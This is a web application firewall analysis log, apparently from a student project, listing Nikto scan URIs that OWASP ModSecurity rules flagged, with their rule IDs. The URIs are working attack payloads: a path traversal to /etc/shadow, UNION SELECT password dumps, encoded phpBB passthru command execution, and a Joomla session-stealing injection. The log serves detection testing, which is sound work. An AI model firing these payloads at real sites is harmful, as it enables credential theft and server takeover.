# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l sql_injection.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_dinamica/owasp/opensource/nikto/sql_injection.clean
Packet [6]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [7]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [14]	Uri [/web/1921681104.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [15]	Uri [/web/1921681104.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [22]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [23]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [32]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [33]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [46]	Uri [/web/104.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [47]	Uri [/web/104.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [62]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [63]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [70]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [71]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [72]	Uri [/web/104.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [73]	Uri [/web/104.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [76]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [77]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [88]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [89]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [92]	Uri [/web/192_168_1_104.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [93]	Uri [/web/192_168_1_104.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [132]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [133]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [225]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [239]	Uri [/web/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [252]	Uri [/web/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [12 ]	Signatures	[932190]	[942270]	[942150]	[942200]	[942310]	[942410]	[942480]	[942430]	[942440]	[942450]	[942431]	[942460]
Packet [253]	Uri [/web/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [12 ]	Signatures	[932190]	[942270]	[942150]	[942200]	[942310]	[942410]	[942480]	[942430]	[942440]	[942450]	[942431]	[942460]
Packet [254]	Uri [/web/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [256]	Uri [/web/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [12 ]	Signatures	[932190]	[942270]	[942150]	[942200]	[942310]	[942410]	[942480]	[942430]	[942440]	[942450]	[942431]	[942460]
Packet [259]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [260]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [261]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [262]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [263]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [264]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [265]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [266]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [267]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [268]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [269]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [270]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [271]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [272]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [273]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [274]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [275]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [276]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [277]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [278]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [279]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [280]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [281]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [282]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [283]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [284]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [285]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [286]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [287]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [288]	Uri [/web/modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [289]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [290]	Uri [/web/forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [291]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [292]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [293]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [294]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [295]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [296]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [297]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [298]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [299]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [300]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [301]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [302]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [303]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [304]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [305]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [306]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [307]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [308]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [309]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [310]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [311]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [312]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [313]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [314]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [315]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [316]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [317]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [318]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [319]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [320]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [321]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [322]	Uri [/web/modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [323]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [324]	Uri [/web/forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [325]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [332]	Uri [/web/db.php?q='&t=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [333]	Uri [/web/rpc.php?q='&t=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [339]	Uri [/web/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)]	Nattacks [16 ]	Signatures	[933151]	[933161]	[942140]	[942190]	[942360]	[942150]	[942200]	[942260]	[942310]	[942330]	[942380]	[942410]	[942480]	[942430]	[942431]	[942460]
Packet [349]	Uri [/web/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27]	Nattacks [2 ]	Signatures	[921180]	[942110]
Packet [350]	Uri [/web/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27]	Nattacks [2 ]	Signatures	[921180]	[942110]
# N. packets [350], [102] with alerts, N. Alerts [526]
